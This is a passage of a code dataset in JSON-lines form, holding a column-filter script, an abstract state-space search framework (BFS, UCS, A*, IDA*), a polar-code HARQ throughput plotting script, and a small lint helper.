stdout.\n 2. Case sensitive for keys. The column value equals one of the keys will return true.\n 4. 
Column index starts from 1.\n    -------------------------------------\n    \\n''')\n    sys.stderr.close()\n    sys.exit(-1)\n\nif __name__ == '__main__':\n    args = []\n    copyComments = False\n    keyFile = ''\n    i = 0\n    while i < len(sys.argv): # parse parameters.\n        if sys.argv[i] == '-c':\n            copyComments = True\n        elif sys.argv[i] == '-f':\n            i += 1\n            keyFile = sys.argv[i]\n        else:\n            args.append(sys.argv[i])\n        i += 1\n\n    sys.argv = args\n    if len(sys.argv) < 2:\n        help()\n\n    col_index = int(sys.argv[1]) - 1\n    action = True # True keep, false remove.\n    if sys.argv[2] == 'r':\n        action = False\n\n    #read key sets.\n    keys = set()\n    if keyFile:\n        with open(keyFile, 'r') as kFile:\n            for line in kFile:\n                line = line.strip()\n                if line:\n                    keys.add(line)\n        #read keys from arguments, skipping argv[1] (column index) and argv[2] (the k|r action flag).\n        keys = keys.union(set(sys.argv[3:]))\n    else:\n        keys = set(sys.argv[3:])\n\n    for line in sys.stdin:\n        line = line.strip()\n        if line:\n            if copyComments and line.startswith('#'):\n                sys.stdout.write('%s\\n'%(line))\n                continue\n\n            ss = line.split(None,col_index+1)\n\n            if action: #keep\n                if ss[col_index] in keys:\n                    sys.stdout.write('%s\\n'%(line))\n            else:\n                if ss[col_index] not in keys:\n                    sys.stdout.write('%s\\n'%(line))\n\n\nsys.stdout.flush()\nsys.stdout.close()\nsys.stderr.flush()\nsys.stderr.close()\n","sub_path":"mx_tools/ColumnSelector.py","file_name":"ColumnSelector.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"245046310","text":"from abc import ABC, abstractmethod\nfrom heapq import heappop, heappush\nfrom typing import Optional, Callable, List, Iterable, Set, Generic, TypeVar, cast, Any\nfrom copy import copy\nfrom pytictoc import TicToc\nfrom threading import Timer\n\nT = TypeVar('T')\nclass StateNode(ABC, Generic[T]):\n    \"\"\"Generic definition of a state node in the search space.\n    Stores the actual state representation, cost and its parent.\n    It is an abstract class and MUST be implemented for your \n    specific problem.\n\n    Attributes:\n        depth (int): Depth in the current path.\n        state (T): Problem state representation.\n        parent (StateNode): Previous state. Defaults to None.\n        cost (int): Cost of reaching the current state.\n        heuristic_cost (int): Heuristic of the current state.\n        final_cost (int): The cost and the heuristic summed up.\n    \"\"\"\n\n    def __init__(self, state: T, parent: Optional['StateNode'] = None):\n        \"\"\"\n        Args:\n            state (T): Problem state representation.\n            parent (StateNode): Previous state. Defaults to None.\n        \"\"\"\n\n        self.depth: int = 0 if parent is None else cast('StateNode', parent).depth + 1\n\n        self.state = state\n        self.parent = parent\n        self.cost = self.arc_cost_fn()\n        self.heuristic_cost = self.heuristic_fn()\n        self.final_cost = self.cost + self.heuristic_cost\n\n    @abstractmethod\n    def next_states(self, *args, **kwargs) -> Iterable:\n        \"\"\"Generates the successor states of the current one.\n        Should be implemented for a specific problem.\n\n        Raises:\n            NotImplementedError: If not implemented in a child class.\n\n        Returns:\n            Iterable: An iterable of the successor states.\n            Generators are preferred for efficiency.\n        \"\"\"\n        raise NotImplementedError\n\n    def state_value(self):\n        return self.state\n\n    def arc_cost_fn(self):\n        \"\"\"Calculates the cost of traversing from the current state\n        to another one. 
Probably you need to override it.\n\n Returns:\n int: The cost.\n \"\"\"\n return 1\n\n def heuristic_fn(self):\n \"\"\"Calculates the heuristic of the current state.\n You should override it only if you want to use A*\n or other heuristic-based algorithms.\n\n Returns:\n int: The heuristic.\n \"\"\"\n return 0\n\n def __repr__(self):\n return f\"< {'(root) ' if self.parent is None else ''}Node ({self.state}) with cost {self.cost} >\"\n\nclass Comparable(ABC):\n \"\"\"Abstract class for defining a comparable object.\n Implement __lt__ operator and the object should support\n sorting using Python's standard library.\n \"\"\"\n\n @abstractmethod\n def __lt__(self, value):\n raise NotImplementedError\n\nclass Hashable(ABC):\n \"\"\"Abstract class for defining a hashable object.\n Implement hexdigest_internal for your custom object.\n This class comes with caching preimplemented.\n \"\"\"\n\n @abstractmethod\n def hexdigest_internal(self):\n raise NotImplementedError\n\n def hexdigest(self):\n if not hasattr(self, 'cached_hash'):\n self.cached_hash = self.hexdigest_internal()\n return self.cached_hash\n\nclass PathIterator:\n \"\"\"Iterator for traversing a path of StateNode objects.\n It traverses backwards from the leaf to the root.\n \"\"\"\n\n NODE_MODE = lambda node: node\n STATE_ONLY_MODE = lambda node: node.state \n\n def __init__(self, leaf: StateNode, mode: Callable = NODE_MODE):\n \"\"\"\n Args:\n leaf (StateNode): Last node in the path.\n mode (Callable, optional): Lambda expression to extract a desired \n value from the nodes. Defaults to NODE_MODE.\n \"\"\"\n self.leaf = leaf\n self.mode = mode\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.leaf is not None:\n current = self.mode(self.leaf)\n self.leaf = self.leaf.parent\n return current\n raise StopIteration\n\nclass SearchingTemplate(ABC):\n \"\"\"Template for implementing a solver for some searching problem.\n You MUST implement a custom StateNode first to use any of the\n searching algorithms below. Some of them need Comparable or\n Hashable to be implemented for you custom StateNode.\n\n The preimplemented algorithms are:\n - BFS\n - UCS (needs Comparable)\n - A* (needs Comparable)\n - A* with open-closed lists (needs Comparable and Hashable)\n - IDA* (needs Comparable)\n\n You need to supply only the root (initial state) to each\n of those. They'll return the soultion. (if it's possible)\n \"\"\"\n\n def __init__(self, logging=False, timeout=60):\n \"\"\"\n Args:\n logging (bool, optional): If should display logging messages. Defaults to False.\n timeout (int, optional): Timeout for each algorithm. 
Defaults to 60.\n \"\"\"\n self.logging = logging\n self.timeout = timeout\n\n def bfs(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running BFS\")\n return self.__bfs_traverse(root, **kwargs)\n\n def ucs(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running UCS\")\n return self.__bfs_traverse(root, ordered=True, **kwargs)\n\n # same as UCS but you should pass a node comparable by f cost\n def a_star(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running A*\")\n return self.__bfs_traverse(root, ordered=True, **kwargs)\n\n def a_star_opt(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running A* open-closed\")\n return self.__bfs_traverse(root, ordered=True, open_closed=True, **kwargs)\n\n FOUND = -1\n UNINITIALIZED_MIN = -2\n\n def ida_star(self, root: StateNode, *args, **kwargs) -> tuple:\n self.__log(\"Running IDA*\")\n\n bound = root.final_cost\n stack = [root]\n all_results: list = []\n\n statistics: dict = {\n 'time': 0,\n 'max_depth': 0,\n 'times': [],\n 'max_in_memory': 1,\n 'total_states': 1,\n }\n\n timer = TicToc()\n timer.tic()\n\n timeout_exit = [False]\n def handle_timeout():\n timeout_exit[0] = True\n\n th_timer = Timer(self.timeout, handle_timeout)\n th_timer.start()\n\n if not self.initial_has_solution(root, *args, **kwargs):\n timeout_exit[0] = True\n\n while not timeout_exit[0]:\n t = self.__iter_dfs(stack, bound, timeout_exit, statistics, *args, **kwargs)\n if t == self.FOUND: \n result = self.compute_solution(stack[-1], *args, **kwargs) \n statistics['times'].append(round(timer.tocvalue(), 5))\n all_results.append(result)\n\n if self.should_exit(all_results, *args, **kwargs):\n break\n if t == self.UNINITIALIZED_MIN:\n break\n bound = t\n statistics['time'] = round(timer.tocvalue(), 5)\n self.__log(f\"Finished in {statistics['time']}s\")\n\n th_timer.cancel()\n\n return all_results, statistics\n\n def __iter_dfs(self, stack: List[StateNode], bound: int, timeout_exit: list, *args, **kwargs) -> int:\n if len(stack) == 0: return 0\n if timeout_exit[0]: return self.UNINITIALIZED_MIN\n\n statistics = args[0]\n statistics['max_in_memory'] = max(statistics['max_in_memory'], len(stack))\n\n node = stack[-1]\n\n if statistics['max_depth'] < node.depth:\n statistics['max_depth'] = node.depth\n self.__log(f\"New depth reached {statistics['max_depth']}\")\n\n if node.final_cost > bound: return node.final_cost\n if self.check_solution(node): return self.FOUND\n\n min_cost = self.UNINITIALIZED_MIN\n for next_node in node.next_states():\n statistics['total_states'] += 1\n\n stack.append(next_node)\n t = self.__iter_dfs(stack, bound, timeout_exit, statistics)\n if t == self.FOUND: return self.FOUND\n if min_cost == self.UNINITIALIZED_MIN or t < min_cost:\n min_cost = t\n stack.pop()\n return min_cost\n\n def __bfs_traverse(self, root: StateNode, ordered=False, open_closed=False, *args, **kwargs) -> tuple:\n if ordered and not isinstance(root, Comparable):\n raise Exception(f\"{root.__class__.__name__} must implement Comparable\")\n if open_closed and not isinstance(root, Hashable):\n raise Exception(f\"{root.__class__.__name__} must implement Hashable\")\n\n all_results: list = []\n queue: Queue = PriorityQueue([root]) if ordered else SimpleQueue([root])\n\n if open_closed:\n closed_list: Set[str] = set()\n\n statistics: dict = {\n 'time': 0,\n 'times': [],\n 'max_in_memory': 1,\n 'total_states': 1,\n }\n\n max_depth = 0\n\n timer = TicToc()\n timer.tic()\n timeout_exit = [False]\n\n def handle_timeout():\n timeout_exit[0] = True\n\n 
th_timer = Timer(self.timeout, handle_timeout)\n th_timer.start()\n\n if not self.initial_has_solution(root, *args, **kwargs):\n timeout_exit[0] = True\n\n while not timeout_exit[0] and queue.size():\n statistics['max_in_memory'] = max(statistics['max_in_memory'], queue.size())\n\n current_node: StateNode = queue.pop()\n\n if open_closed:\n current_node_hash = cast(Hashable, current_node).hexdigest()\n \n if current_node_hash in closed_list:\n continue\n \n closed_list.add(current_node_hash)\n\n if max_depth < current_node.depth:\n max_depth = current_node.depth\n self.__log(f\"New depth reached {max_depth}\")\n\n if self.check_solution(current_node, *args, **kwargs):\n result = self.compute_solution(current_node, *args, **kwargs)\n all_results.append(result)\n statistics['times'].append(round(timer.tocvalue(), 5))\n\n if self.should_exit(all_results, *args, **kwargs):\n break\n \n \n successors = current_node.next_states(*args, **kwargs)\n\n for succ in successors:\n statistics['total_states'] += 1\n if open_closed and succ.hexdigest() in closed_list:\n continue\n\n queue.push(succ)\n\n th_timer.cancel()\n\n statistics['time'] = round(timer.tocvalue(), 5)\n self.__log(f\"Finished in {statistics['time']}s\")\n\n statistics['max_depth'] = max_depth\n return (all_results, statistics)\n\n def __log(self, msg, level=\"INFO\"):\n if self.logging:\n print (f\"[{level}] {msg}\")\n\n @abstractmethod\n def initial_has_solution(self, node: StateNode, *args, **kwargs) -> bool:\n \"\"\"Checks if the initial state is valid and solvable.\n\n Args:\n node (StateNode): The node of the initial state.\n\n Returns:\n bool: True if it is solvable.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def check_solution(self, node: StateNode, *args, **kwargs) -> bool:\n \"\"\"Checks if the current node is a solution state.\n\n Args:\n node (StateNode): Current state.\n\n Returns:\n bool: True if it is.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def compute_solution(self, node: StateNode, *args, **kwargs):\n \"\"\"Computes the path of the solution.\n The node should be tested beforehand that it is a \n solution state.\n\n Args:\n node (StateNode): Solution state.\n\n Returns:\n any: Solution representation.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def should_exit(self, results, *args, **kwargs) -> bool:\n \"\"\"Checks if the goal has been reached.\n The algorithm will stop when it returns true.\n\n Args:\n results (list): Already computed solutions.\n\n Returns:\n bool: True if should stop the algorithm.\n \"\"\"\n raise NotImplementedError\n\nclass Queue(ABC, Generic[T]):\n def __init__(self, initial: List[T] = []):\n self.q = copy(initial)\n\n def size(self) -> int:\n return len(self.q)\n\n def extend(self, items: Iterable[T]):\n for item in items:\n self.push(item)\n\n @abstractmethod\n def push(self, item: T):\n raise NotImplementedError\n\n @abstractmethod\n def pop(self) -> T:\n raise NotImplementedError\n\nclass SimpleQueue(Queue):\n def push(self, item: T):\n self.q.append(item)\n\n def pop(self) -> T:\n return self.q.pop(0)\n\nclass PriorityQueue(Queue):\n def push(self, item: T):\n heappush(self.q, item)\n\n def pop(self) -> T:\n return heappop(self.q)","sub_path":"unibuc/kr/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645068734","text":"from tbounds import *\n\n\n#=================================================choice of 
R\n#~ N=1024\n#~ p1=0.03\n#~ p2=0.11\n#~ p3=0.17\n#~ (I,Z1)=pcon.getreliability_orderZ(N,p1)\n#~ (I,Z2)=pcon.getreliability_orderZ(N,p2)\n#~ (I,Z3)=pcon.getreliability_orderZ(N,p3)\n#~ plt.plot(range(N),[10**Z for Z in Z1],\"g\",label=\"$p_1=0.03,R_1=510/1024$\")\n#~ plt.plot(range(N),[10**Z for Z in Z2],\"r\",label=\"$p_2=0.11,R_2=255/1024$\")\n#~ plt.plot(range(N),[10**Z for Z in Z3],\"b\",label=\"$p_3=0.17,R_3=170/1024$\")\n#~ #plt.plot(range(N),[10**z1-10**z2 for (z1,z2) in zip(Z1,Z2)],\"k\")\n#~ print pl.CapacityBSC(1024,p1)/3\n\n#~ plt.title(\"Choice of $R$ based on $Z(W) \\leq 5*10^{-2}$,N =1024 \\nand satisfying $R_2=R_1/2,R_3=R_1/3$ \") \n#~ plt.legend(loc=\"best\")\n#~ plt.grid(True)\n#~ print pl.CapacityBSC(1024,p2)\n#~ print pl.CapacityBSC(1024,p3)\n#~ print pl.Inversecap1024(pl.CapacityBSC(1024,p1)/3)\n#~ plt.show()\n\n#=================================================Plot PMD estimates\n#~ # PF is mismatch, pm is match\n\n#~ complist=[0.03,0.11,0.17]\n#~ p_1=complist[0]\n#~ p_2=complist[1]\n#~ p_3=complist[2]\n#~ N=1024\n#~ NR_p1=510\n#~ NR_p2=510/2\n#~ NR_p3=510/3\n\n#~ TlistANA=[1,2,4,8,16,32,64,128]\n\n\n#~ fig=plt.figure()\n#~ fig.suptitle(\"Estimation of $P_{MD},P_{F}$ for N=1024,$NR_1=$\"+str(NR_p1)+\"\\n p_1=$\"+str(p_1)+\"$p_2=$\"+str(p_2)+\"$p_3=$\"+str(p_3))\n\n#~ plt.subplot(221)\n#~ #pf1\n#~ PF1=pfunionZ(TlistANA,N,NR_p1,p_1) \n#~ pf1file=\"./simresults/polarchannel_FERvsp_FRSB0p03_510in1024_18-04-26_21-57-42.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pf1file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PF1sim=[10**e for e in lines[1]]\n#~ plt.semilogy(TlistANA,PF1,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(Tlist,PF1sim,\":b^\",label=\"Sim\")\n#~ plt.grid(True)\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{F,1}$')\n#~ plt.xlabel('$T$')\n\n#~ plt.subplot(222)\n#~ #pm1\n#~ PMD1=mdindeZ(TlistANA,N,NR_p1,p_2)\n#~ PMD11=mdmaxZ(TlistANA,N,NR_p1,p_2)\n#~ pmd1file=\"./simresults/polarchannel_FERvsp_FRSB0p11_510in1024_18-04-26_21-56-52.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pmd1file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PMD1sim=lines[2]\n#~ plt.semilogy(TlistANA,PMD1,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(TlistANA,PMD11,\"-g^\",label=\"Ana-max\")\n#~ plt.semilogy(Tlist,PMD1sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{MD,1}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.subplot(223)\n#~ #Pf2\n#~ PF2=pfunionZ(TlistANA,N,NR_p2,p_2)\n#~ pf2file=\"./simresults/polarchannel_FERvsp_FRSB0p11_255in1024_18-04-26_22-02-37.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pf2file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PF2sim=[10**e for e in lines[1]]\n#~ plt.semilogy(TlistANA,PF2,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(Tlist,PF2sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{F,2}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.subplot(224)\n#~ #pm2\n#~ PMD2=mdindeZ(TlistANA,N,NR_p2,p_3)\n#~ PMD21=mdmaxZ(TlistANA,N,NR_p2,p_3)\n#~ pmd2file=\"./simresults/polarchannel_FERvsp_FRSB0p17_255in1024_18-04-26_21-59-03.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pmd2file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PMD2sim=lines[2]\n#~ plt.semilogy(TlistANA,PMD2,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(TlistANA,PMD21,\"-g^\",label=\"Ana-max\")\n#~ plt.semilogy(Tlist,PMD2sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{MD,2}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n#~ plt.show()\n#========================================================= throughput analysis\n\n\n#~ complist=[0.03,0.11,0.17]\n#~ p_1=complist[0]\n#~ 
p_2=complist[1]\n#~ p_3=complist[2]\n#~ N=1024\n#~ NR_p1=510\n#~ NR_p2=510/2\n#~ NR_p3=510/3\n\n#~ FER3file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter3_18-04-26_22-04-23.txt\"\n#~ FER2file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter2_18-04-26_22-05-14.txt\"\n#~ FER1file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter1_18-04-26_22-06-46.txt\"\n\n#~ TPTfilep1=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p03_18-04-27_14-50-18.txt\"\n#~ TPTfilep2=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p11_18-04-27_14-48-37.txt\"\n#~ TPTfilep3=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p17_18-04-27_14-47-21.txt\"\n\n#~ #number of p and tpt is same, dont confuse\n#~ (x,z)=(9,11)\n#~ FER1iter=np.array([10**i for i in ml.getline(FER1file,[x,z])[1]])\n#~ FER2iter=np.array([10**i for i in ml.getline(FER2file,[x,z])[1]])\n#~ FER3iter=np.array([10**i for i in ml.getline(FER3file,[x,z])[1]])\n\n\n\n#~ print FER1iter,FER2iter,FER3iter\n\n#~ TlistANA=np.arange(1,NR_p2-NR_p3,2)\n#~ PMD1=np.array(mdindeZ(TlistANA,N,NR_p1,p_2))\n#~ PMD2=np.array(mdindeZ(TlistANA,N,NR_p2,p_3))\n#~ PF1=np.array(pfunionZ(TlistANA,N,NR_p1,p_1))\n#~ PF2=np.array(pfunionZ(TlistANA,N,NR_p2,p_2))\n\n#~ FER1est=[estimateFER(TlistANA,N,NR_p1,p_1,1),estimateFER(TlistANA,N,NR_p1,p_2,1),estimateFER(TlistANA,N,NR_p1,p_3,1)]\n#~ FER2est=[estimateFER(TlistANA,N,NR_p1,p_1,2),estimateFER(TlistANA,N,NR_p1,p_2,2),estimateFER(TlistANA,N,NR_p1,p_3,2)]\n#~ FER3est=[estimateFER(TlistANA,N,NR_p1,p_1,3),estimateFER(TlistANA,N,NR_p1,p_2,3),estimateFER(TlistANA,N,NR_p1,p_3,3)]\n#~ #===============================tpt \n#~ fig=plt.figure()\n#~ plt.subplot(311)\n#~ plt.title(\"Throughput vs T\")\n#~ #for p1\n#~ E_Iterp1=(1-PF1)+2*PF1\n#~ FERp1=FER1iter[0]*(1-PF1)+FER2iter[0]*(PF1)\n#~ TPTANAp1=(NR_p1-np.array(TlistANA))*(1-FERp1)/(N*E_Iterp1)\n#~ plt.plot(TlistANA,TPTANAp1,\"-r^\",label=\"TPT-ANA,p=\"+str(p_1))\n#~ plt.plot(TlistANA[list(TPTANAp1).index(max(TPTANAp1))],max(TPTANAp1),\"ko\",label=\"max(TPT-ANA)\")\n#~ FERp1=np.multiply(FER1est[0],(1-PF1))+np.multiply(FER2est[0],(PF1))\n#~ TPTANAp1=(NR_p1-np.array(TlistANA))*(1-FERp1)/(N*E_Iterp1)\n#~ plt.plot(TlistANA,TPTANAp1,\"-c^\",label=\"TPT-FER,p=\"+str(p_1))\n#~ plt.plot(TlistANA[list(TPTANAp1).index(max(TPTANAp1))],max(TPTANAp1),\"yo\",label=\"max(TPT-FER)\")\n\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_1))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.grid(True)\n\n\n#~ plt.subplot(312)\n#~ #for p=p2\n#~ E_Iterp2=PMD1+2*np.multiply(1-PMD1,1-PF2)+3*np.multiply(1-PMD1,PF2)\n#~ FERp2=FER1iter[1]*PMD1+FER2iter[1]*np.multiply(1-PMD1,1-PF2)+FER3iter[1]*np.multiply(1-PMD1,PF2)\n#~ TPTANAp2=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp2)\n#~ plt.plot(TlistANA,TPTANAp2,\"-r^\",label=\"TPT-ANA,p=\"+str(p_2))\n#~ plt.plot(TlistANA[list(TPTANAp2).index(max(TPTANAp2))],max(TPTANAp2),\"-ko\",label=\"max(TPT-ANA)\")\n#~ FERp2=np.multiply(FER1est[1],PMD1)+np.multiply(FER2est[1],1-PMD1,1-PF2)+np.multiply(FER3est[1],1-PMD1,PF2)\n#~ TPTANAp2=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp2)\n#~ plt.plot(TlistANA,TPTANAp2,\"-c^\",label=\"TPT-FER,p=\"+str(p_2))\n#~ 
plt.plot(TlistANA[list(TPTANAp2).index(max(TPTANAp2))],max(TPTANAp2),\"-yo\",label=\"max(TPT-FER)\")\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_2))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.grid(True)\n\n\n#~ plt.subplot(313)\n#~ #for p=p3\n#~ E_Iterp3=2*(1-PMD2)+3*PMD2\n#~ FERp3=FER2iter[2]*(1-PMD2)+FER3iter[2]*PMD2\n#~ TPTANAp3=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp3)\n#~ plt.plot(TlistANA,TPTANAp3,\"-r^\",label=\"TPT-ANA,p=\"+str(p_3))\n#~ plt.plot(TlistANA[list(TPTANAp3).index(max(TPTANAp3))],max(TPTANAp3),\"ko\",label=\"max(TPT-ANA)\")\n#~ FERp3=np.multiply(FER2est[2],(1-PMD2))+np.multiply(FER3est[2],PMD2)\n#~ TPTANAp3=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp3)\n#~ plt.plot(TlistANA,TPTANAp3,\"-c^\",label=\"TPT-FER,p=\"+str(p_3))\n#~ plt.plot(TlistANA[list(TPTANAp3).index(max(TPTANAp3))],max(TPTANAp3),\"yo\",label=\"max(TPT-FER)\")\n\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_3))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.show()\n\n#====================================final scheme performance\n\nfileT32=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T32_18-04-28_15-31-33.txt\"\nfileT1=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T1_18-04-28_15-29-44.txt\"\nfileT11=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T11_18-04-29_14-56-55.txt\"\nfileT8=\"/home/smart/Desktop/Project/code/Polar-slepian/V_22/simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T8_18-04-28_15-30-03.txt\"\ncomplist=[0.03,0.11,0.17]\nN=1024\nfig=plt.figure()\nfig.suptitle(\"HARQ schemes \\n N=1024,ED for $\\{p_1=$\"+str(np.round(complist[0],decimals=3)) +\"$,p_2=$\"+str(np.round(complist[1],decimals=3)) +\"$,p_3= $\"+str(np.round(complist[2],decimals=3))+\"$ \\}$\")\nR_p1=510\nmaxiters=3\n(x,y,z)=(9,10,11)\nT=1\nlines=ml.getline(fileT1,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT1,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-r^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n\n#~ T=11\n#~ lines=ml.getline(fileT11,[x,y,z])\n#~ point=len(lines[0])\n#~ MeanIters=pl.getMeanIter(ml.getline(fileT11,[13])[0],3)\n#~ plt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-b^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\nT=8\nlines=ml.getline(fileT8,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT8,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-b^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n\n\nT=32\nlines=ml.getline(fileT32,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT32,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-g^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n#~ T=1\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(1)],\"ro\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ 
plt.plot(complist[1],lines[1][lines[0].index(1)],\"ro\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(1)],\"ro\")\n\n#~ T=8\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(8)],\"bo\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(complist[1],lines[1][lines[0].index(8)],\"bo\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(8)],\"bo\")\n\n#~ T=32\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(32)],\"go\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(complist[1],lines[1][lines[0].index(32)],\"go\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(32)],\"go\")\n\n#==================UK\nT=0\nfileUK=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_UK510in1024_T0_18-05-03_15-42-41.txt\"\nlines=ml.getline(fileUK,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileUK,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-c^',label='Decoding failure, $NR_1=$'+str(R_p1))\n\nchannel_plist=list(np.linspace(0.01,0.2,20))\nplt.plot(channel_plist,[pl.CapacityBSC(1,p) for p in channel_plist],\"k\",label=\"Capacity\")\n\n\n\nplt.ylabel('Throughput=($NR_1-T$)*(1-FER)/N*E[Iterations]')\nplt.xlabel('BSC(p)')\nplt.grid(True)\nplt.legend(loc=\"best\")\n\nplt.show()\n","sub_path":"Polar-slepian/V_22/maxtptscheme1plotter.py","file_name":"maxtptscheme1plotter.py","file_ext":"py","file_size_in_byte":11704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222200857","text":"from os import path\nfrom subprocess import check_call\n\nROOT = path.realpath(path.abspath(path.join(path.dirname(__file__), '..')))\n\n\ndef run():\n check_call(['flake8', '--doctests'])\n\n\ndef fix():\n check_call(cwd=ROOT,\n args=[\n 'yapf', '-r', '-i',\n path.join(ROOT, 'logdna'),\n path.join(ROOT, 'scripts'),\n path.join(ROOT, 'tests')\n ])\n\n run()\n","sub_path":"scripts/lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124781030","text":"from . 
